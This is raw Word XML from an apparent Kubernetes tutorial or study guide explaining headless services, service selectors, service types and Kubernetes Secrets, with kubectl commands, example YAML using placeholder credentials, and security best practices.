    <w:p w14:paraId="21507B57"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27988269"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name: my-headless-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CFCCC4"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEF2DC7"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clusterIP: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC1C70"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BB2CF"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app: myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07275292"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A975454"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 protocol: TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AD136"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port: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A88F562"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      targetPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A989B" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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F60CE3E">
          <v:rect id="_x0000_i3419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD2A48" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Service Selectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204BD9EF"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service selector</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to select a group of pods that the service will route traffic to. This selector matches the pods with labels and makes sure that traffic is forwarded to the correct set of pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F46E22"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For example, if you have a label app: myapp on your pods, you can use this label in the service selector to route traffic to these pods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7431CCB0"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358680F0"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D3A8D"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app: myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8BF204"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Alternatively, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>label selectors</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to match multiple labels or even exclude certain labels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D03F2C" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="00000000" w:rsidP="009D1D6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FD4E576">
          <v:rect id="_x0000_i3420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11144BE9" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B0E3B7"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Kubernetes services enable communication between various components in your cluster and make it easier to expose your applications to the outside world. Depending on the use case, you can choose from several types of services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671CB48D"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ClusterIP</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Internal communication within the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53477397"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NodePort</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes the service on a static port for external access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A570C"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LoadBalancer</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides external access with a cloud provider's load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A567B"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ExternalName</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Maps a service to an external DNS name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB46E8B" w14:textId="77777777" w:rsidR="0013672E" w:rsidRPr="009D1D6F" w:rsidRDefault="0013672E"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By abstracting the way pods communicate and exposing stable endpoints for your services, Kubernetes makes it easier to manage your distributed applications. Let me know if you need any additional details on services!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44332A7E" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BF7CA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7858E78">
          <v:rect id="_x0000_i3421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAA18C8" w14:textId="77777777" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF7CA0" w:rsidP="00BF7CA0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D1C6863" w14:textId="586A9C3F" w:rsidR="00BF7CA0" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF7CA0" w:rsidP="00BF7CA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="846" w:name="_Toc196308326"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Kubernetes Secret?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="846"/>
    </w:p>
    <w:p w14:paraId="276211E0" w14:textId="676AE866" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23" w:rsidP="009D1D6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kubernetes Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785483C2"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In Kubernetes, </w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are objects used to store sensitive data, such as passwords, OAuth tokens, SSH keys, and other sensitive configuration information, which you don’t want to store in plaintext in your application code or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FA1F6"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Secrets are used to securely manage sensitive information and allow you to grant access to that information within your Kubernetes cluster in a controlled manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53053734" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Why Use Kubernetes Secrets?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23A1C2"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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Secrets ensure that sensitive data is not stored directly in pod specifications, environment variables, or configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401371E"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Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes provides built-in mechanisms for controlling who can access specific secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAC30C0"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Ease of Use</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Secrets allow you to inject sensitive data into your pods in a way that’s easy to manage, update, and rotate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6E7BB" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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How Kubernetes Secrets Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84AA54"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Base64 Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes Secrets store data in base64-encoded format to avoid plain text storage. However, this encoding is not encryption, so you should still ensure that access control mechanisms are in place to protect the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887379A"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Access Control</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kubernetes secrets can be encrypted at rest depending on the configuration of your Kubernetes cluster. You can control access using Kubernetes RBAC (Role-Based Access Control), ensuring only authorized entities have access to the secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166CD5AE" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Creating Kubernetes Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E39AB"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You can create secrets in Kubernetes using several methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C073D93"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Using kubectl</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD1EBD2" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Create a secret from literal values</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C50B2B3" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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kubectl create secret generic my-secret --from-literal=password=supersecret123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE46DF2" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Create a secret from a file</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AAC90" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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kubectl create secret generic my-secret --from-file=ssh-privatekey=path/to/private.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9AED60" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Create a secret from a directory</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B914647" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23" w:rsidP="009D1D6F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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kubectl create secret generic my-secret --from-file=/path/to/directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F41F9CA"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Using a YAML file</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can define a secret using a YAML file, and then apply it with kubectl apply.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5118BF15"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Example YAML (secret.yaml)</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D67567B"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lastRenderedPageBreak/>
        <w:t>apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406D7BF5"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kind: Secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43394696"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0755C781"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name: my-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D35FA2"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type: Opaque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48086D11"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data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D0D42"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username: bXlVc2VybmFtZQ==  # base64 encoded value of 'myUsername'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55024104"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password: c3VwZXJzZWNyZXQ=  # base64 encoded value of 'supersecret'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52851E74"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To create the secret from the YAML file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE2679"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kubectl apply -f secret.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6646E418" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Types of Kubernetes Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A95B63"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Opaque</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (default): General-purpose secrets that store arbitrary data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423C9AC"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docker-registry</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to store Docker registry credentials, used by Kubernetes for pulling images from private Docker registries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC83C2"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basic-auth</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Contains credentials for basic HTTP authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71576CC2"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ssh-auth</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores SSH keys for SSH authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F45306" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Accessing Secrets in Pods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521F375"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You can expose secrets to your pods in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1285A706"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Environment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can inject secrets as environment variables into the containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C654AA7"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDA85B"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kind: Pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C609408"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501BE31A"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name: mypod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E4415F"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACCD0D"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B434902"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 name: mycontainer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F54B108"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image: myimage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1881E9"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env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3C80D2"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 name: SECRET_USERNAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E269C1B"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valueFrom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3F8AE8"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secretKeyRef:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0AA9E"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name: my-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245E3C0D"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key: username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E329198"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Volume Mounts</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can mount secrets as files inside the container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05084A04"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apiVersion: v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C2E1B"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kind: Pod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3051938F"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44968EF2"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name: mypod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6A404"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FF1FF2"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74794F5E"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 name: mycontainer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6BBC9"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image: myimage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABF0AEC"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volumeMounts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12F825"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 name: secret-volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C6794E"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mountPath: "/etc/secrets"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7128ABAE"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readOnly: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404F2646"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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C3335"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 name: secret-volume</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C541AF"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secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5475B0B6"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 xml:space="preserve">        secretName: my-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420923AA" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23"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Best Practices for Using Secrets in Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9F9A9"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Encryption at Rest</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enable encryption at rest for secrets in your Kubernetes cluster to ensure that the data is protected when stored in etcd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADBBE7B"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Least Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use RBAC (Role-Based Access Control) to restrict access to secrets to only the pods or users who require it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2758B7"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lastRenderedPageBreak/>
        <w:t>Use External Secret Management</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consider integrating with external secret management solutions (e.g., HashiCorp Vault, AWS Secrets Manager) for enhanced security and auditing features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F832AC3"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Avoid Hardcoding</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Do not hardcode secrets in the application code or configuration files. Instead, manage them securely via Kubernetes Secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160C6338"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rotate Secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Regularly rotate secrets and update them in your cluster to minimize security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74470FDE" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65389E26" w14:textId="77777777" w:rsidR="000E5B23" w:rsidRPr="009D1D6F" w:rsidRDefault="000E5B23" w:rsidP="009D1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D1D6F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes Secrets provide a secure mechanism for managing sensitive data in your Kubernetes applications. By decoupling sensitive information from the application code and using Kubernetes' built-in access control features, you can securely handle credentials, tokens, and other sensitive information in your cluster. It's important to follow security best practices such as encryption, least privilege access, and integration with external secret management systems to further enhance the security posture of your cluster.</w:t>
      </w:r>
    </w:p>
